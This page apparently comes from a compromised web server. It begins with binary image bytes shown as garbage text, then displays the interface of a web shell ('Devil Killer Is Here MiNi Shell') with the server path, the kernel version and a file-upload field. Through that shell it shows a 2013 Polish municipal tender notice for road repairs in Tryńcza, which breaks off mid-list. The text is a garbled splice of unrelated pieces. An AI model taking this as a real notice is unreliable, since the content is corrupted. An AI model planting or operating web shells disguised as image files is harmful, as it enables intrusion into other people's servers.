JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130731/305812-N-2013.html

<p class="kh_header"><b>Tryńcza: Remont dróg na terenie gminy Tryńcza - Etap II
Część 1 - Remont dróg z nawierzchnią mineralno-bitumiczną
Część 2 - Remont dróg z powierzchniowym utrwaleniem nawierzchni 
przy użyciu emulsji i grysów</b><br>
<b>Numer ogłoszenia: 305812 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tryńcza , Tryńcza 127, 37-204 Tryńcza, woj. podkarpackie, tel. 016 6421221, faks 016 6421221.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug-tryncza.e-zet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg na terenie gminy Tryńcza - Etap II
Część 1 - Remont dróg z nawierzchnią mineralno-bitumiczną
Część 2 - Remont dróg z powierzchniowym utrwaleniem nawierzchni 
przy użyciu emulsji i grysów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest  Remont dróg na terenie gminy Tryńcza - Etap II. Przedmiotem zamówienia są roboty budowlane polegające na remoncie dróg na terenie gminy Tryńcza z podziałem na 2 części. 
Część 1  - Remont dróg z nawierzchnią mineralno-bitumiczną- w m. Gniewczyna Łańcucka drogi nr ewid. 2691, 2734, 3043, 3067, 3095, 3101, 3433, 3920, w m. Gniewczyna Tryniecka drogi nr ewid. 940, 993, w m. Jagiełła drogi nr ewid. 495, 567, 1016, w m. Tryńcza  drogi nr ewid. 408,432, 441, 952.
W zakres zamówienia wchodzi:
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2691 w km 0+000-0+263,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2734 w km 0+000-0+096,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3043 w km 0+000-0+076,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3067 w km 0+000-0+080,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3095 w km 0+000-0+105,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3101 w km 0+000-0+123,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3433 w km 0+000-0+080,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3920 w km 0+000-0+065,
-	remont drogi w m. Gniewczyna Tryniecka nr ewid. 940 w km 0+000-0+190,
-	remont drogi w m. Gniewczyna Tryniecka nr ewid. 993 w km 0+000-0+400,
-	remont drogi w m. Jagiełła nr ewid. 495 w km 0+000-0+120,
-	remont drogi w m. Jagiełła nr ewid. 567 w km 0+000-0+080,
-	remont drogi w m. Jagiełła nr ewid. 1016 w km 0+000-0+080,
-	remont drogi w m. Tryńcza nr ewid. 408 w km 0+000-0+185,
-	remont drogi w m. Tryńcza nr ewid. 432 w km 0+000-0+188,
-	remont drogi w m. Tryńcza nr ewid. 441 w km 0+000-0+168,
-	remont drogi w m. Tryńcza nr ewid. 952 w km 0+000-0+196.
Część 2 - Remont dróg z powierzchniowym utrwaleniem nawierzchni przy użyciu emulsji i grysów - w m. Głogowiec  droga nr ewid. 562, w m.  Gniewczyna Łańcucka drogi nr ewid. 1694, 2801, 3161,  w m. Gorzyce drogi  nr ewid. 940, 1195/1, 1524,  w m. Jagiełła drogi nr ewid. 1414, 1498, w m. Ubieszyn  drogi nr ewid. 474-475, 515, 542, 592, w m. Wólka Ogryzkowa droga nr ewid. 196-179, w m. Tryńcza drogi nr ewid. 185, 283-268,  883.
W zakres zamówienia wchodzi:
-	remont drogi w m. Głogowiec nr ewid. 562 w km 0+000-0+350,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 1694 w km 0+000-0+037,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2801 w km 0+000-0+060,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3161 w km 0+000-0+150,
-	remont drogi w m. Gorzyce nr ewid. 940 w km 0+000-0+240,
-	remont drogi w m. Gorzyce nr ewid. 1195/1 w km 0+000-0+230,
-	remont drogi w m. Gorzyce nr ewid. 1524 w km 0+000-0+130,
-	remont drogi w m. Jagiełła nr ewid. 1414 w km 0+000-0+090,
-	remont drogi w m. Jagiełła nr ewid. 1498 w km 0+000-0+325,
-	remont drogi w m. Ubieszyn nr ewid. 474-475 w km 0+000-0+550,
-	remont drogi w m. Ubieszyn nr ewid. 515  w km 0+000-0+188,
-	remont drogi w m. Ubieszyn nr ewid. 542 w km 0+000-0+225,
-	remont drogi w m. Ubieszyn nr ewid. 592 w km 0+000-0+240,
-	remont drogi w m. Wólka Ogryzkowa nr ewid. 196-179 w km 0+000-0+430,
-	remont drogi w m. Tryńcza nr ewid. 185 w km 0+000-0+115,
-	remont drogi w m. Tryńcza nr ewid. 283-268 w km 0+000-0+240,
-	remont drogi w m. Tryńcza nr ewid. 883 w km 0+000-0+160.

Wartość fakturowanych robót w roku 2013 nie może przekroczyć 20 % wartości poszczególnych części zamówienia.

2.	Szczegółowy zakres robót do wykonania został określony w specyfikacji technicznej wykonania robót oraz w przedmiarze robót, które stanowią załączniki do specyfikacji istotnych warunków zamówienia oraz dokumentacji do zgłoszenia robót właściwemu organowi, tj.: 
Załącznik Nr 7  Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych,
Załącznik Nr 8 Przedmiar robót, 
Załącznik Nr 9 Załącznik graficzny.

3.	Zamawiający dopuszcza zastosowanie urządzeń i materiałów równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych nie gorszych od założonych w opisie.


4.	Wymagany okres gwarancji i rękojmi na wykonane roboty  wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w oparciu o art. 67 ust. 1 pkt. 6 ustawy Pzp  - przedmiotem zamówienia uzupełniającego będą roboty budowlane polegające na powtórzeniu tego samego rodzaju  zamówień stanowiące nie więcej niż 50 % wartości dla każdej z części zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z  art. 22 ust. 1  ustawy Pzp.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli  wykonawca wykaże, iż  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonał i prawidłowo ukończył minimum dwie roboty  budowlane polegające na budowie, przebudowie lub remoncie dróg  o wartości co najmniej 60 000,00 zł (słownie: sześćdziesiąt tysięcy   zł) brutto każda z robót.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z  art. 22 ust. 1  ustawy Pzp.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób,  tj. przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi - kierownik budowy posiadający uprawnienia do kierowania robotami budowlanymi o specjalności drogowej zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz.U. z 2010 r. Nr 243 poz.1623 z póź. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z  art. 22 ust. 1  ustawy Pzp.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy (wzór stanowi załącznik nr 1 do SIWZ).
2)	Kosztorys ofertowy sporządzony na podstawie przedmiaru robót.
3)	Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonania, których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w oryginale lub kopii, której zgodność z oryginałem poświadczono notarialnie.
4)	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp. Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów. Pełnomocnictwo składa się w oryginale lub kopii poświadczonej notarialnie.
5)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy:
1)	Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie pisemnej.
2)	Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:  
-	zmiany spowodowane warunkami atmosferycznymi, niezawinione, niemożliwe do uniknięcia przez Wykonawcę, 
-	zmiany spowodowane nieprzewidzianymi warunkami wynikającymi z robót ziemnych (ewentualne wykopaliska archeologiczne),
-	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji  technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
-	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; 
-	zmiana obowiązującej stawki VAT;
-	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
-	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ,
-	w przypadku konieczności wykonania przez Wykonawcę robót dodatkowych, uzupełniających na wykonanie powyższych robót zostanie zawarta odrębna umowa pod warunkiem zachowania obowiązujących przepisów Prawa zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug-tryncza.e-zet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Tryńcza, 37-204 Tryńcza 127 pokój Nr 4 - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 10:00, miejsce: Urząd Gminy Tryńcza, 37-204 Tryńcza 127 (sekretariat - pokój Nr 11 - piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Remont dróg z nawierzchnią mineralno- bitumiczną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1  - Remont dróg z nawierzchnią mineralno-bitumiczną- w m. Gniewczyna Łańcucka drogi nr ewid. 2691, 2734, 3043, 3067, 3095, 3101, 3433, 3920, w m. Gniewczyna Tryniecka drogi nr ewid. 940, 993, w m. Jagiełła drogi nr ewid. 495, 567, 1016, w m. Tryńcza  drogi Nr ewid. 408,432, 441, 952.
W zakres zamówienia wchodzi:
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2691 w km 0+000-0+263,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2734 w km 0+000-0+096,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3043 w km 0+000-0+076,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3067 w km 0+000-0+080,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3095 w km 0+000-0+105,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3101 w km 0+000-0+123,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3433 w km 0+000-0+080,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3920 w km 0+000-0+065,
-	remont drogi w m. Gniewczyna Tryniecka nr ewid. 940 w km 0+000-0+190,
-	remont drogi w m. Gniewczyna Tryniecka nr ewid. 993 w km 0+000-0+400,
-	remont drogi w m. Jagiełła nr ewid. 495 w km 0+000-0+120,
-	remont drogi w m. Jagiełła nr ewid. 567 w km 0+000-0+080,
-	remont drogi w m. Jagiełła nr ewid. 1016 w km 0+000-0+080,
-	remont drogi w m. Tryńcza nr ewid. 408 w km 0+000-0+185,
-	remont drogi w m. Tryńcza nr ewid. 432 w km 0+000-0+188,
-	remont drogi w m. Tryńcza nr ewid. 441 w km 0+000-0+168,
-	remont drogi w m. Tryńcza nr ewid. 952 w km 0+000-0+196.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Remont dróg z powierzchniowym utrwaleniem nawierzchni przy użyciu emulsji i grysów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Remont dróg z powierzchniowym utrwaleniem nawierzchni przy użyciu emulsji i grysów - w m. Głogowiec nr ewid. 562, w m.  Gniewczyna Łańcucka drogi nr ewid. 1694, 2801, 3161,  w m. Gorzyce drogi nr ewid.  nr ewid. 940, 1195/1, 1524,  w m. Jagiełła drogi nr ewid. 1414, 1498, w m. Ubieszyn  drogi nr ewid. 474-475, 515, 542, 592, w m. Wólka Ogryzkowa droga nr ewid. 196-179, w m. Tryńcza drogi nr ewid. 185, 283-268,  883.
W zakres zamówienia wchodzi:
-	remont drogi w m. Głogowiec nr ewid. 562 w km 0+000-0+350,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 1694 w km 0+000-0+037,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 2801 w km 0+000-0+060,
-	remont drogi w m. Gniewczyna Łańcucka nr ewid. 3161 w km 0+000-0+150,
-	remont drogi w m. Gorzyce nr ewid. 940 w km 0+000-0+240,
-	remont drogi w m. Gorzyce nr ewid. 1195/1 w km 0+000-0+230,
-	remont drogi w m. Gorzyce nr ewid. 1524 w km 0+000-0+130,
-	remont drogi w m. Jagiełła nr ewid. 1414 w km 0+000-0+090,
-	remont drogi w m. Jagiełła nr ewid. 1498 w km 0+000-0+325,
-	remont drogi w m. Ubieszyn nr ewid. 474-475 w km 0+000-0+550,
-	remont drogi w m. Ubieszyn nr ewid. 515  w km 0+000-0+188,
-	remont drogi w m. Ubieszyn nr ewid. 542 w km 0+000-0+225,
-	remont drogi w m. Ubieszyn nr ewid. 592 w km 0+000-0+240,
-	remont drogi w m. Wólka Ogryzkowa nr ewid. 196-179 w km 0+000-0+430,
-	remont drogi w m. Tryńcza nr ewid. 185 w km 0+000-0+115,
-	remont drogi w m. Tryńcza nr ewid. 283-268 w km 0+000-0+240,
